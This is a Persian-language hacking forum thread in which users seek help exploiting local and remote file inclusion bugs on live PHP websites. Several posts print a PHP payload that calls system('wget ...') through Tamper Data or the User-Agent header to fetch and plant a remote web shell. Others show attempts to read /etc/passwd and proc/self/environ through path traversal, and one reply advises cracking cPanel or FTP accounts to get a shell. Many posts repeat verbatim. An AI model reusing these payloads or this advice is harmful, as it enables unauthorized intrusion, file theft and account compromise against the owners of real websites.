warning: Main(./inc_en_board_x.php): Failed to open stream: No such file or directory in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

warning: Main(): Failed opening './inc_en_board_x.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

دروود
اگه نميتوني خوب تشخيص بدي با اسكنر ها عزيزم اسكن كن . تا به جوابه سولت برسي.

بدروود

با سلام

دوستان با دادن متغیر این ارور دیده شد:

عکس(1)

[Only registered and activated users can see links]


با اضافه کردن لینک شل این ارور رو میده ولی شل Run نمیشه:

عکس(2)

[Only registered and activated users can see links]


ممنون میشم منو راهنمائی کنید.

با سلام

دوستان با دادن متغیر این ارور دیده شد:

عکس(1)

[Only registered and activated users can see links]


با اضافه کردن لینک شل این ارور رو میده ولی شل Run نمیشه:

عکس(2)

[Only registered and activated users can see links]


ممنون میشم منو راهنمائی کنید.


سلام دوست عزیز

به احتمال خیلی زیاد طو تنظیمات php سرور Allow Url Include فعال نشده که نمی تونی صفحه shell خودت رو Inclunde کنی .

Allow Url Include باعث می شه که شما بتونید از طریق Url صفحات خودتون رو Include کنید .

با سلام

دوستان با دادن متغیر این ارور دیده شد:

عکس(1)

[Only registered and activated users can see links]


با اضافه کردن لینک شل این ارور رو میده ولی شل run نمیشه:

عکس(2)

[Only registered and activated users can see links]


ممنون میشم منو راهنمائی کنید.

سلام دوست عزیز

به احتمال خیلی زیاد طو تنظیمات php سرور allow url include فعال نشده که نمی تونی صفحه shell خودت رو inclunde کنی .

Allow url include باعث می شه که شما بتونید از طریق url صفحات خودتون رو include کنید .


سلام..

ایا هیچ راهی برای تزریق شل کد وجود نداره؟

سلام من یک سوال داشتم آیا استفاده از باگ lfi محتص به php است؟
چون من از یک سایتی میتونم با همین روش در فایل ها بچرخم ولی نمیدونم چه فایل هایی رو میتونم باز کنم که به دردم بخوره و در ضمن فقط میتونم در دایرکتوری همان سایت بچرخم

سلام من یک سوال داشتم آیا استفاده از باگ lfi محتص به php است؟
چون من از یک سایتی میتونم با همین روش در فایل ها بچرخم ولی نمیدونم چه فایل هایی رو میتونم باز کنم که به دردم بخوره و در ضمن فقط میتونم در دایرکتوری همان سایت بچرخم

بله مختص به زبان پی اچ پی هست و در بعضی از سرورهای ویندوز که پی اچ پی هم ساپورت میکنند جوابگو هست

بله مختص به زبان پی اچ پی هست و در بعضی از سرورهای ویندوز که پی اچ پی هم ساپورت میکنند جوابگو هست
اخه من العان یک ترگت دارم که میوتن با دادن آدرس هایی مثل ../../ تو فایل ها و دایرکتوری هاش بچرخم آیا کار دیگه میتونم باهاش بکنم؟

اخه من العان یک ترگت دارم که میوتن با دادن آدرس هایی مثل ../../ تو فایل ها و دایرکتوری هاش بچرخم آیا کار دیگه میتونم باهاش بکنم؟

بهتره شما ویدیو های آموزشی موجود در سایت رو مشاهده کنید تا از پایه متوجه این موضوع بشید.
بله میشه کارهای دیگه ای هم کرد.

اقا يه سوال

در باگ lfi اگر ما به proc/self/environ دسترسي نداشته باشيم چه روش هاي براي اپلود شل هست?
تبديل به rce? و يا..........

تشکر

یه زاه ساده هست که شما بیاین لیست یوزرها رو بیرون بکشید و اکانت سی پنل یا اف تی پی و... رو کرک کنید تا شل بگیرید

یه زاه ساده هست که شما بیاین لیست یوزرها رو بیرون بکشید و اکانت سی پنل یا اف تی پی و... رو کرک کنید تا شل بگیرید
خوب اون هارو از کجا باید بکشیم بیرون!:36:

خدا قوت و خسته نباشيد

تارگت :
[Only registered and activated users can see links]

با سه روش براى آپلود شل اقدام كردم ولى متاسفانه جواب نداد
1 - Tamper Data
2 - User Agent
3 - Browser User Agent

لينك آپلود شل :


<?php system('wget [Only registered and activated users can see links] -O smasher.php'); ?>


ممنون ميشم راهنمايى كنيد
در ضمن در مورد فاير فاكس 4 بود كه از كجا ميتونم general.user.agent رو پيدا كنم

موفق باشيد

يا على

ببخشيد
قصد اسپم ندارم
ولى ممنون ميشم يكى به سؤال ديروزم جواب بده

موفق باشيد
يا على

بخدا نه قصد دارم اسپم بدم و نه قصد دارم تعداد پستهام بره بالا

ممنون ميشم يكى جواب بده

موفق باشيد
يا على

خدا قوت و خسته نباشيد

تارگت :
[Only registered and activated users can see links]

با سه روش براى آپلود شل اقدام كردم ولى متاسفانه جواب نداد
1 - Tamper Data
2 - User Agent
3 - Browser User Agent

لينك آپلود شل :


<?php system('wget [Only registered and activated users can see links] -O smasher.php'); ?>


ممنون ميشم راهنمايى كنيد
در ضمن در مورد فاير فاكس 4 بود كه از كجا ميتونم general.user.agent رو پيدا كنم

موفق باشيد

يا على

صفحه داره سفید load میشه یعنی access نداریم.

سلام من با باگهای زیادی کار کردم ولی تاحالا با باگ rfi کار نکردم

وقتی جلوی مساوی یک لینک وارد می کنم با این ارور مواجه میشم

Warning: include(includes/lang_[Only registered and activated users can see links]) [function.include]: failed to open stream: No such file or directory in /var/[Only registered and activated users can see links] on line 9

خوشحال میشم منو راهنمایی کنید

آقا مين هرچي target باگ rfi دارم كه دقيقآ مثل فيلماي آموزشي ميرم و با tamper data يه شل روش ميذارم
ولي هر بار ميرم كه شل رو ببينم نيستش و ارور not found ميده/اينم يكي از target هام
[Only registered and activated users can see links]
اينم كدي كه توي tamper data ميذارم
<?php system('wget [Only registered and activated users can see links]');?>
hاينم جايي كه ميرم شل رو ببينم
[Only registered and activated users can see links]
تو رو خدا كمكم كنيد/2 روزه وقتم گرفته/هر كاري ميكنم اين باگ rfi*رو نمي تونم باش شل آپ كنم

سلام دوستان چرا یکی به سوالات بالا جواب نمیده اخه من هم همین مشکل رو دارم با temper data شل اپ میکنم اما و قتی ادرس صفحه شل رو میزنم شلم نیست

این اخطار رو توجه کنید
Warning: include() [function.include]: Failed opening '../../../../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kprovoli/public_html/new/index.php on line 64-----------
این اخطار کجاش مشکل داره که جلو نمیره و هیچی به من نمیده ؟
حتی boot.ini رو هم جواب نمیده و همین اخطار رو میده ( من تازه کارم !! )

این اخطار رو توجه کنید
warning: Include() [function.include]: Failed opening '../../../../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kprovoli/public_html/new/index.php on line 64-----------
این اخطار کجاش مشکل داره که جلو نمیره و هیچی به من نمیده ؟
حتی boot.ini رو هم جواب نمیده و همین اخطار رو میده ( من تازه کارم !! )

به نظر میاد این تالار مدیری نداره !!
جواب سوال خودم و بالاتر تو این چند ماهه داده نشده چرا ؟ یکی به داد ما برسه !!

سلام دوستان این سایت باگ lfi داره ولی نموتونم به etc/passwd دسترسی پیدا کنم کسی می تونه این کارو بکنه ؟
[Only registered and activated users can see links]